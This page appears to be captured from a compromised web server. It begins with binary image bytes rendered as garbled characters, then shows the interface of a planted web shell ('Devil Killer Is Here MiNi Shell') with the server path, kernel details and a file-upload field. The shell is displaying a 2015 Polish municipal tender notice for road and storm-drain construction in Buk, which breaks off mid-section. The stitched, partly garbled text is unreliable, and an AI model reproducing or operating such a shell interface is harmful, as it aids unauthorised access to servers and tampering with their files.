JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150512/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150512/68015-N-2015.html

<p class="kh_header"><b>Buk: BUDOWA ULICY CZARNIECKIEGO W BUKU NA ODCINKU OD UL. POWSTAŃCÓW WIELKOPOLSKICH DO ULICY KASZTANOWEJ WRAZ Z PLACEM MANEWROWYM W UL. KASZTANOWEJ I ODPROWADZENIEM WÓD OPADOWYCH DO KANALIZACJI DESZCZOWEJ</b><br>
<b>Numer ogłoszenia: 68015 - 2015; data zamieszczenia: 12.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto i Gmina Buk , ul. Ratuszowa 1, 64-320 Buk, woj. wielkopolskie, tel. 061 8140671, faks 061 8140101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.buk.gmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BUDOWA ULICY CZARNIECKIEGO W BUKU NA ODCINKU OD UL. POWSTAŃCÓW WIELKOPOLSKICH DO ULICY KASZTANOWEJ WRAZ Z PLACEM MANEWROWYM W UL. KASZTANOWEJ I ODPROWADZENIEM WÓD OPADOWYCH DO KANALIZACJI DESZCZOWEJ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiot zamówienia składa się z dwóch części:Zadanie nr 1: Budowa ulicy Czarnieckiego w Buku na odcinku od ul. Powstańców Wielkopolskich do ul. Kasztanowej. Zadanie nr 2: Budowa placu manewrowego w ul. Kasztanowej.
1. Założenia projektowe. Ulicę Czarnieckiego zaprojektowano o jezdni szerokości 6,00 m z obustronnymi chodnikami po 2,00. Wyjątkiem jest fragment chodnika na początkowym odcinku od strony Powstańców Wielkopolskich, gdzie przewiduje utrzymanie istniejącej szerokości chodników, tj.odpowiednio: 1,20 i 1,80 m. Zbieg ulic Kasztanowej i Czarnieckiego zostanie zakończony placem manewrowym. Krotki odcinek ul. Kasztanowej zaprojektowano o jezdni szerokości 6,00 m i jednostronnym chodniku szer. 2,00 m.Szczegółowy zakres opracowania niniejszego projektu przedstawiono na planie sytuacyjnym.
2. Warunki gruntowowodne. 
Na podstawie dokumentacji geotechnicznej we wnioskach dla projektanta nawierzchni jezdni napisano: a.Zgodnie z Rozporządzeniem Ministra Transportu i Gospodarki Morskiej w sprawie warunków technicznych, jakim powinny odpowiadać drogi i ich usytuowanie, na głębokości posadowienia do 1 m p.p.t. określa się jako przeciętne (woda na głębokości 1-2 m p.p.t) z grupą nośności podłoża G1. b. W przypadku ułożenia korpusu drogowego w strefie zalegania gruntów gliniastych plastycznych zajdzie konieczność zabezpieczenia nawierzchni przed wysadzinami. Tworzeniu się wysadzin i przełomów można zapobiec przez:zastosowanie pod nawierzchnia podsypki piaskowej o odpowiedniej grubości (zmiana gruntu wysadzinowego na niewysadzinowy), zastosowanie podbudowy z gruntu stabilizowanego cementem lub bitumem,
 dobre zagęszczenie podłoża w dnie koryta, dobre odwodnienie powierzchniowe. 
3. Konstrukcja nawierzchni. 
Konstrukcję nawierzchni zaprojektowano w uzgodnieniu z Inwestorem. Projektowany krawężnik prosty (opornik) dwustronnie obniżyć do 4 cm nad projektowaną nawierzchnię jezdni ulic i placu. Nawierzchnia ulicy Czarnieckiego i Kasztanowej
Konstrukcję nawierzchni ulic: Czarnieckiego, odcinka Kasztanowej i placu manewrowego w ul. Kasztanowej zaprojektowano na podstawie Dziennika Ustaw nr 43 Rozporządzenie Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999r. (ze zmianami), jako jezdnie dróg klasy D w strefie zamieszkania, w rozumieniu przepisów o ruchu drogowym. Przyjęto następującą konstrukcję ulicy: a. Nawierzchnia z kostki brukowej typu: Polbruk Behaton grubości 8cm, koloru szarego, bezfazowa, b. Podsypka piaskowo-cementowa 1:4 o grubości 3 cm, c. Podbudowa zasadnicza z chudego betonu B-7,5 (o Rm równe 6-9 MPa) o grubości 15 cm lub alternatywnie z kruszywa łamanego 0I31,5 mm stabilizowanego mechanicznie, d. Podbudowa pomocnicza z gruntocementu wykonanego w betoniarce o Rm równe 5,0 MPa, o grubości warstwy po zagęszczeniu 10 cm, e. Warstwa odsączająca z piasku o grubości po zagęszczeniu 10 cm,  f. Dla podłoża wskaźnik zagęszczenia powinien wynosić 1,00. 
Spód konstrukcji nawierzchni nie może sięgać niżej niż 0,5 m nad istniejący gazociąg. 
Sprawdzenie warunków mrozoodporności 
Dla KR2 i G1 wymaga grubości konstrukcji nawierzchni ze względu na mrozoodporności wynosi:0,45 x hz   gdzie hz równe 0,80 m, 0,45 x 0,80 równe 0,36 m
Grubość konstrukcji wynosi:
8+3+15+10 +10 równe 46 cm większe 36 cm
Krawężnik betonowy prosty (opornik o wyokrąglonej jednej krawędzi) 12x25x100 cm ustawiony zostanie na podsypce cementowo  piaskowej 1:4 grub. 5 cm  i ławie bet. grub. 15 cm, z oporem i poszerzeniem pod ściek, z betonu B-15. Przy skrzyżowaniach, w ciągu ulicy Czarnieckiego - w miejscu wyznaczonych przejść dla pieszych  krawężnik na szerokości przejścia należy pozostawić na projektowanej wysokości 4 cm od jezdni Do odprowadzenia wód opadowych zaprojektowano ściek przykrawężnikowy z kostki betonowej typu HOLLAND grub. 8 cm układanej krótszym bokiem do krawężnika (1 rząd). Ściek układać na podsypce cementowo - piaskowej 1:4 o grub. 3 cm i ławie bet. poszerzonej pod krawężnikiem, z betonu B-15.Po stronie pasa postojowego w ulicy Kasztanowej krawężnik ustawiony zostanie na wysokości 4 cm nad projektowaną nawierzchnię jezdni. Od wału akustycznego pas postojowy oddzielić obrzeżem 8x30x100 cm na podsypce cementowo - piaskowej 1:4 o grub. 5 cm i ławie bet. grub. 10 cm.Pas postojowy wykonać z betonowych płyt ażurowych typu MEBA o grub. 10 cm na podsypce cementowopiaskowej 1:4 o grub. 3 cm i podbudowie z chudego betonu B-7,5 grubości 12 cm lub alternatywnie z kruszywa łamanego stabilizowanego mechanicznie. Pochylenie poprzeczne pasa postojowego 2% w kierunku jezdni.
4. Nawierzchnia chodników i zjazdów. 
Nawierzchnia chodników (kolor grafitowy) i zjazdów (kolor szary) ulicy Czarnieckiego i Kasztanowej (od strony północnej) o szerokości 2,00 m wykonana zostanie z betonowej kostki brukowej typu Behaton o grub. 8 cm na podsypce cementowo - piaskowej 1:4 o grub. 3 cm, podbudowie z chudego betonu B-7,5 o grub. 12 cm oraz warstwie odsączającej z piasku o grub. 10 cm po zagęszczeniu. Chodnik i zjazdy zaprojektowano ze spadkiem 2% w stronę jezdni. W ulicy Czarnieckiego projektuje się wykonać chodnik dwustronny przy obniżonym krawężniku do 4 cm nad projektowaną nawierzchnię jezdni. Na żądanie Inwestora dopuszczony zostanie postój samochodów na chodniku. W związku z tym konstrukcję nawierzchni chodników w ulicy Czarnieckiego wykonać analogicznie do konstrukcji zjazdów - jak przedstawiono to powyżej. Chodniki oddzielić od granic posesji lub zieleni, obrzeżem betonowym 6x20x100 cm na podsypce cementowo piaskowej 1:4 grub. 5 cm i ławie bet. grub. 10 cm, z betonu B-15. 5. Pas zieleni Po rozplantowaniu ziemi wykonać siew z mieszanki traw oraz nawieźć azofoską. Całość pielęgnować. 6. Odwodnienie - kanalizacja deszczowa. Odwodnienie nawierzchni ulicy dzięki odpowiednio zastosowanym spadkom podłużnym i poprzecznym odprowadzone zostanie poprzez wpusty uliczne do istniejącej kanalizacji deszczowej. W ul. Kasztanowej projektuje się fragment sieci kanalizacji deszczowej zakończonej studnią rewizyjną o średnicy 1000 mm z PVC. Studnia rewizyjna - włazowa winna być wyposażona w kinetę przelotową, która zostanie zaślepiona od strony zachodniej. W przyszłości umożliwi to rozbudowę sieci na w ulicy Kasztanowej i ulicach sąsiednich. Łącznie zaprojektowano 5 szt. nowych studni rewizyjnych (w tym 3 szt. nabudowane na istniejącym kolektorze) oraz 2 szt. istniejących studni przewiduję się do przebudowy (nowy komin i właz, bez wymiany kinety). Przedmiotowy fragment sieci kanalizacji deszczowej zostanie włączony do istniejącego rurociągu w ul. Czarnieckiego, poprzez nabudowaną studnię rewizyjną. Sieć kanalizacji deszczowej projektuje się z rur litych PVC o średnicach: 315mm (L równe 13m) i 400 mm (L=12m), o SN = 8 kNIm2. Pochylenia przęseł kolektora wynoszą 0,2 %.Wpusty uliczne wykonać z rur PVC o średnicy 500 mm z osadnikiem oraz z rusztem żeliwnym.Przykanaliki wykonać z rur PVC o średnicy 160 mm, o pochyleniach 2-10 %.Przed wykonaniem kanałów należy wykonać ręcznie przekopy próbne celem zlokalizowania i zinwentaryzowania istniejącego uzbrojenia. Szczególnie dotyczy to miejsce skrzyżowań oraz zbliżeń z kanałem projektowym. W przypadku, gdy namierzone uzbrojenia zarówno pod względem wysokościowym jak i sytuacyjnym odbiegają do przyjętych w projekcie - należy skontaktować się z właścicielem urządzenia. Napotkane niezidentyfikowane uzbrojenie należy zgłosić inspektorowi nadzoru. Realizacja robót w pobliżu linii energetycznych wymaga wyłączenia ich spod napięcia.Projektowany kanał kanalizacji deszczowej prowadzony będzie w ciągach komunikacyjnych  jezdni i chodniku. Sieć kanalizacji deszczowej zaprojektowano zgodnie z warunkami technicznymi Inwestora.Na projektowanej trasie kanału deszczowego i przyłączy występują skrzyżowania z istniejącą siecią kanalizacji sanitarnej, siecią wodociągową, gazociągiem i przyłączami,  istniejącymi  kablami energetycznymi i  telekomunikacyjnymi. Skrzyżowania projektowanego kanału kanalizacji deszczowej z istniejącym uzbrojeniem podziemnym pokazano na planach sytuacyjno-wysokościowych. Przed przystąpieniem do wykonania sieci kanalizacyjnej należy zgłosić się do właścicieli uzbrojenia i uzgodnić termin i sposób budowy kanalizacji.  Kanał w miejscu skrzyżowania z istniejącym uzbrojeniem ułożyć w wykopach wąskoprzestrzennych wykonanych ręcznie po min. 2 m z każdej strony istn. uzbrojenia. Na czas wykonywania robót oraz po ich zrealizowaniu kable i rurociągi w wykopie należy zabezpieczyć. Skrzyżowania z istniejącym uzbrojeniem wykonać zgodnie z obowiązującymi normami i przepisami. Pozostałe warunki zachować zgodnie z załączonymi uzgodnieniami. Wszystkie studnie objęte projektem na kanale deszczowym i istniejącym kanale deszczowym zaprojektowano jako typowe prefabrykowane w planie okrągłe o średnicy wewnętrznej  1000 z betonu wibroprasowanego B45, ze szczelnym łączeniem (na uszczelkę gumową) poszczególnych elementów studni i przejść kanałów. Na płycie fundamentowej z bet. min. B-30 grub. 20 cm zostanie osadzone prefabrykowane dno studni. Dno studni jest elementem prefabrykowanym betonowym, stanowiącym połączenie kręgu i płyty dennej. W prefabrykowanym elemencie dna studni wykonane jest wyprofilowane koryto (kineta) przeznaczone do przepływu ścieków i łączenia kanałów oraz spocznik (powierzchnia pomiędzy kinetą, a ścianą komory). Studnie zwieńczono zwężką 1000I600 z włazem typu ciężkiego.Kręgi muszą być wyposażone fabrycznie w stopnie włazowe z pręta stalowego w otulinie tworzywowej klamrowej, co 25 cm w układzie drabinkowym. Przejścia kanałów przez ściany studzienek wykonuje się jako szczelne w stopniu uniemożliwiającym infiltrację wody gruntowej i eksfiltrację ścieków. Do regulacji wysokości studni  rzędnej włazu można stosować pierścienie dystansowe lub podmurowanie pod włazem cegłą klinkierową pełną klasy min. 250. Kanały kanalizacji deszczowej należy posadowić bezpośrednio na 15 cm podsypce z piasku zagęszczonego o Isrówne1,0. W przypadku pojawienia się wód gruntowych  przed przystąpieniem do realizacji kanalizacji deszczowej, wykopy należy odwodnić. Do zasypywania kolektora deszczowego należy wykorzystać piasek. Warstwę ochronna należy starannie zagęścić ubijakami po obu stronach rurociągu pamiętając o utrzymaniu wilgotności optymalnej. 
Dno wykopu pod podłoże w normalnych warunkach gruntowych powinno być wykonane z dokładnością + 2 cm - + 5 cm w zależności od sposobu głębienia w stosunku do projektowanej rzędnej. Powierzchnia podłoża wykonana z ubitego - zagęszczonego piasku, powinna być zgodna z zaprojektowanym spadkiem. Ewentualne ubytki w wysokości podłoża należy wyrównać wyłącznie piaskiem. Obsypkę kanałów PVC należy wykonać warstwami grub. 0,10 m do wysokości 0,30 m ponad wierzch rury (warstwa ochronna). Materiał zalecany do użycia jako obsypka  to piasek sypki, drobnośrednio lub gruboziarnisty. Wskaźnik zagęszczenia obsypki  Is równe 1,0. Zasypkę wykopu należy wykonać również z piasku warstwami o grub. ok. 0,30 m zagęszczanymi, aż do rzędnej spodu warstwy konstrukcyjnej jezdni lub chodnika. Do zasypki użyć piasku zakupionego i dowiezionego z dokopu. Wskaźnik zagęszczenia Is równe 1,0. Wykopy pod elementy kanalizacji deszczowej zaprojektowano jako wąskoprzestrzenne. W miejscach występowania studni rewizyjnych i studzienek  poszerzenie wykopu. Ściany wykopu wyższe niż 1,0 m należy zabezpieczyć szalowaniem pełnym ze śrubami rozporowymi. Wykopy należy wykonywać sprzętem mechanicznym, jedynie na odcinkach skrzyżowań z istniejącym uzbrojeniem podziemnym  wykop ręczny,  po min. 2.0 m od osi przebiegu uzbrojenia. 
7. Roboty ziemne Roboty ziemne obliczone zostały na podstawie przekrojów poprzecznych i wykonane zostaną sprzętem mechanicznym. Zwraca się uwagę na zachowanie szczególnej ostrożności przy prowadzeniu robót ziemnych w pobliżu uzbrojenia terenu. 8. Organizacja ruchu  oznakowanie i elementy bezpieczeństwa ruchu. Na ul. Czarnieckiego przy skrzyżowaniu z ul. Powstańców Wlkp. oznakowano istniejące przejście dla pieszych znakami D-6. Ponieważ lokalizacja przejścia została nieznacznie zmieniona (odsunięcie o ok. 2,0 m od skrzyżowania) konieczne stało się przestawienie istniejącego znaku pionowego A-7IC-6. 
Na przejściu pozostawiono oznakowanie poziome liniami P-10, dodając znaki P-14 (dotyczy wszystkich istniejących w obszarze skrzyżowania przejść ). Przed skrzyżowaniem ulicy Czarnieckiego z ul. Kasztanową wprowadzono nowe przejście dla pieszych oznakowane znakami pionowymi D-6 oraz znakami poziomymi P-10 i P-14. Zgodnie z zaleceniem Inwestora na ulicy Czarnieckiego zaprojektowano dwa progi zwalniające w celu poprawy bezpieczeństwa ruchu drogowego.  Projektowane progi przyjęto wg rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003 r. zał. nr 4 w sprawie szczegółowych warunków technicznych dla znaków drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania przy drogach. Przyjęto progi zwalniające, listwowe typu U-16d, wyniesione 7 cm ponad projektowany poziom niwelety.  Szerokości progów skrócono do 5,60 m - w celu odwodnienia jezdni poprzez obustronne ścieki przykrawężnikowe o szerokości 0,20 m. Nawierzchnię progów należy wykonać z kostki betonowej grub. 8 cm w kolorze czerwonym (bezfazowa), a konstrukcję przyjąć taką, jak całej jezdni. Progi  należy oznakować znakami drogowym pionowym A-11a z tabliczkami T-1 (napis: 15 m lub 20 m ) i znakami B-33 ( 20 kmIh ). Na bokach progów - w chodniku należy ustawić stalowe słupki blokujące  U-12c (biało-czerwone) uniemożliwiające wyminięcie progu jazdą po chodniku. Na ul. Kasztanowej - po wschodniej i południowej stronie placu manewrowego zaprojektowano również ustawienie w odległościach co 1,5 m (0,5 m od krawężnika) stalowych słupków blokujących U-12c (biało-czerwone) uniemożliwiających przejazdowy ruch kołowy. 9. Poprawa bezpieczeństwa. Wpływ na środowisko.Inwestycja będzie miała pozytywny wydźwięk zarówno w strefie bezpieczeństwa jak i w strefie zadowolenia społecznego. Wszelkie materiały pozostałe z rozbiórek należy zagospodarować w sposób zgodny z właściwymi przepisami oraz wytycznymi niniejszej dokumentacji lub odwieźć na składowisko działające legalnie i zgodnie z przepisami dotyczącymi ochrony środowiska, posiadające wymagane zezwolenia na składowanie tego rodzaju materiałów (gruz budowlany, ziemia). Inwestycja nie jest zaliczana do inwestycji mogących znacząco lub potencjalnie oddziaływać na środowisko.10. Uwagi końcowe. Podczas robót ziemnych należy zwrócić szczególną uwagę na istniejące uzbrojenie: woda, gaz, kable telekomunikacyjne i energetyczne. Wykopy w pobliżu zbrojenia wykonać ręcznie, w celu zlokalizowania faktycznego przebiegu urządzeń. Przed przystąpieniem do robót powiadomić właścicieli sieci o terminie rozpoczęcia prac. Na czas realizacji inwestycji - szczególnie w sąsiedztwie wykopów pod kanalizację deszczową  należy zabezpieczyć przejścia dla pieszych. W warunkach ruchu ulicznego - w razie konieczności - wykonawca wykona przekrycie wykopów pomostami z barierkami jako przejścia dla pieszych oraz ustawi szczelne wygrodzenie wokół odkrytych wykopów. Szczegółowy przebieg urządzeń przedstawia mapa sytuacyjna  rysunek nr 6  inwentaryzacja istniejącego uzbrojenia terenu. 
II. Niniejszy przedmiot zamówienia należy wykonać zgodnie z: 1. projektem budowlanym opracowanym przez jednostkę projektową Janusz Idkowiak, z siedzibą na Osiedlu Orła Białego 44m37, 61-251 Poznań na zadanie inwestycyjne : budowa ulicy Czarnieckiego w Buku na odcinku od ul. Powstańców Wielkopolskich do ul. Kasztanowej wraz z placem manewrowym w ul. Kasztanowej i odprowadzeniem wód opadowych do kanalizacji deszczowej, 2. Specyfikacją Istotnych Warunków Zamówienia, 3. obowiązującymi przepisami prawa budowlanego i przepisami prawa dotyczącymi warunków technicznych oraz zgodnie z zasadami sztuki budowlanej, 4. szczegółową specyfikacją techniczną wykonania i odbioru robót, 5. zgodnie z decyzją pozwolenia na budowę - nr sprawy: AB.6740.17.69.2015.XVII.
III. Zamawiający zastrzega, że w przypadku niewystarczającej kwoty środków, jakie zostały zabezpieczone w budżecie gminy o kolejności realizacji zadań będzie decydowała kolejność ich opisania w SIWZ,tj.w pierwszej kolejności realizowane będzie zadanie nr 1, potem zadanie nr 2. IV. UWAGI DO PROJEKTU i SSTWiORB 1. Zamawiający będzie wymagał od Wykonawcy projektu organizacji i zabezpieczenia ruchu na czas trwania robót oraz jego realizacji podczas trwania robót. 2. Zamawiający przewiduje możliwość wystąpienia robót związanych z: dostosowaniem istniejących zjazdów do posesji poprzez ich częściowe przebrukowanie, wyprawkami betonowymi istniejących cokołów płotów lub fundamentów budynków.3. Występujące w dokumentacji nazwy własne producentów lub wyrobów zostały użyte wyłącznie 
w celu wskazania założonego standardu przyjętych rozwiązań. Zamawiający dopuszcza ujęcie 
w ofercie, a następnie zastosowanie innych materiałów i urządzeń niż podane w dokumentacji technicznej pod warunkiem zapewnienia parametrów równoważnych - nie gorszych niż określone w tej dokumentacji. Pod pojęciem parametry równoważne - nie gorsze Zamawiający rozumie parametry o co najmniej takich samych lub wyższych standardach jakościowych, niż wskazane w dokumentacji projektowej , w tym w SSTWiORB. 4. W przypadku opisu przedmiotu zamówienia za pomocą norm, aprobat, specyfikacji technicznych 
i systemów odniesienia, o których mowa w art. 30 ust. 1-3 ww Ustawy Pzp Zamawiający dopuszcza rozwiązania równoważne opisywanym. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego jest obowiązany wykazać, że oferowane przez niego dostawy, usługi lub roboty budowlane spełniają wymagania określone przez Zamawiającego. 5. Po zakończeniu wszelkich robót, dokonaniu wpisu w dzienniku budowy przez kierownika budowy i potwierdzeniu gotowości do odbioru przez inspektora nadzoru Wykonawca pisemnie zawiadomi Zamawiającego o gotowości do odbioru. Do zawiadomienia Wykonawca załączy miedzy innymi inwentaryzację geodezyjną powykonawczą w 4 kompletach zawierającą:mapy sytuacyjno-wysokościowe z wkreślonym przebiegiem sieci kanalizacyjnej z przykanalikami, studniami rewizyjnymi i studniami przyłączeniowymi oraz potwierdzenie złożenia dokumentacji w Powiatowym Ośrodku Dokumentacji Geodezyjnej i Kartograficznej w Poznaniu 1 komplet map Wykonawca dostarczy Zamawiającemu w dniu zgłoszenia gotowości do odbioru końcowego;   pozostałe 3 komplety map - niezwłocznie po uzyskaniu pieczątki z Powiatowego Ośrodka Dokumentacji Geodezyjnej i Kartograficznej w Poznaniu potwierdzającej przyjęcie dokumentacji do zasobów Ośrodka,szkice geodezyjne,zestawienie długości wybudowanej sieci kanalizacyjnej, przykanalików, z podaniem ich ilości i średnic, ilości wybudowanych studni rewizyjnych i wpustów, z określeniem materiałów, z jakich zostały wykonane i średnic, ilości (w m2) wbudowanej kostki betonowej, ilości (w mb) wbudowanego krawężnika, obrzeży i innych materiałów..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.31.40-2, 45.23.31.20-6, 45.23.32.23-8, 45.23.13.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości: 8.000,00 zł. 2. Wykonawca może wnieść wadium jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy, tj.: 1) pieniądzu, 2)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 3)	gwarancjach bankowych, 4) gwarancjach ubezpieczeniowych, 5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007 r. Nr 42, poz. 275 z późn. zmianami). 3. Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert. 4. Wadium w pieniądzu należy wnieść przelewem  na konto Zamawiającego: Nr  83 1020 4144 0000 6502 0007 2116. 5. W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego. 6. W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego - Urząd Miasta i Gminy Buk, ul. Ratuszowa 1 - pok. 31 lub dołączyć do oferty.
7. Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt. 2 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
